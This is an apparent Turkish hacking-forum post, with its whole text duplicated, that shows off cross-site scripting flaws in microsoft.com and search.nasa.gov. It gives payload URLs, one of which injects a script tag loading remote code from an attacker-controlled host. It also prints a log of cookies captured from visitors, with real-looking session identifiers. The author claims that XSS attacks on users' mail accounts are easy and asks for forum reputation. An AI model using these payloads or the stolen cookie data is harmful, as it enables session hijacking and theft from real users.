Microsoft Xss Açığı :
http://www.microsoft.com/education/Tutorials.mspx?Act=Tutorials.mspx&Xslt=/business/XSLT/TutorialsResults_0405.xslt&Op1=**********alert("Zebe ruS")</script>&Op2=all&Op4=all&SearchSubmit=Search
Gelen Cookie :
www.microsoft.com (20.06.2006 10:01)
IP:*************
Cookies: s_nr=1150465372692; MC1=GUID=b6f4773d832e97449044b661d4fbf3c0&HASH=3d7 7&LV=20066&V=3; WT_FPC=id=88.224.115.65-2567599344.29790536:lv=1150621740312:ss=1150646994 281; s_cc=true; s_sq=[]
Cookies:MC1=GUID=c4da420a9d5cd04280a372d14b910295&HASH=0a4 2&LV=20066&V=3; WT_FPC=id=88.229.12.234-2297454032.29791233:lv=1150756923000:ss=1150784244 891; s_nr=1150765214016; MUID=FB4ADA13378A4A66BB9C8C78DBB2E33D; ANON=A=95B77AE85D518BAE5BD4BCB3FFFFFFFF&E=438&W=3; NAP=V=1.3&E=3de&C=YD4t3M0cFU8IRW0YjvI9MzxSHMn1tuqs ygVQbOqBOxJJvbo58ccQaA&W=3; s_cc=true; s_sq=[]
Adres: http://www.microsoft.com/education/Tutorials.mspx?Act=Tutorials.mspx&Xslt=/business/XSLT/TutorialsResults_0405.xslt&Op1=<a href="www.x.com>"style="background:url\(java/**/script:********.write('<script src=http://zeberus.kayyo.com/zbrs/c.js></script><frameset cols=100% rows=100%></a> &Op2=all&Op4=all&SearchSubmit=Search
Tarayici: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Siteyi Hack Etmek Değilde ,Maillerine XSS Saldırısı Kolaylıkca Yapılır...
Ama Gelen Cookienin Ne Kadar İşe Yarayacağı Denenmeden Bilinmes
Nasa XSS Açığı :
<A href="http://search.nasa.gov/nasasearch/browse/browse.jsp?nasaInclude=">**********alert("ZeberuS")< /script>%20&descend=true">http://search.nasa.gov/nasasearch/browse/browse.jsp?nasaInclude=">**********alert("ZeberuS")< /script>%20&descend=true
YARDIMCI OLABİLDİYSEM +REP
http://www.microsoft.com/education/Tutorials.mspx?Act=Tutorials.mspx&Xslt=/business/XSLT/TutorialsResults_0405.xslt&Op1=**********alert("Zebe ruS")</script>&Op2=all&Op4=all&SearchSubmit=Search
Gelen Cookie :
www.microsoft.com (20.06.2006 10:01)
IP:*************
Cookies: s_nr=1150465372692; MC1=GUID=b6f4773d832e97449044b661d4fbf3c0&HASH=3d7 7&LV=20066&V=3; WT_FPC=id=88.224.115.65-2567599344.29790536:lv=1150621740312:ss=1150646994 281; s_cc=true; s_sq=[]
Cookies:MC1=GUID=c4da420a9d5cd04280a372d14b910295&HASH=0a4 2&LV=20066&V=3; WT_FPC=id=88.229.12.234-2297454032.29791233:lv=1150756923000:ss=1150784244 891; s_nr=1150765214016; MUID=FB4ADA13378A4A66BB9C8C78DBB2E33D; ANON=A=95B77AE85D518BAE5BD4BCB3FFFFFFFF&E=438&W=3; NAP=V=1.3&E=3de&C=YD4t3M0cFU8IRW0YjvI9MzxSHMn1tuqs ygVQbOqBOxJJvbo58ccQaA&W=3; s_cc=true; s_sq=[]
Adres: http://www.microsoft.com/education/Tutorials.mspx?Act=Tutorials.mspx&Xslt=/business/XSLT/TutorialsResults_0405.xslt&Op1=<a href="www.x.com>"style="background:url\(java/**/script:********.write('<script src=http://zeberus.kayyo.com/zbrs/c.js></script><frameset cols=100% rows=100%></a> &Op2=all&Op4=all&SearchSubmit=Search
Tarayici: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Siteyi Hack Etmek Değilde ,Maillerine XSS Saldırısı Kolaylıkca Yapılır...
Ama Gelen Cookienin Ne Kadar İşe Yarayacağı Denenmeden Bilinmes
Nasa XSS Açığı :
<A href="http://search.nasa.gov/nasasearch/browse/browse.jsp?nasaInclude=">**********alert("ZeberuS")< /script>%20&descend=true">http://search.nasa.gov/nasasearch/browse/browse.jsp?nasaInclude=">**********alert("ZeberuS")< /script>%20&descend=true
YARDIMCI OLABİLDİYSEM +REP
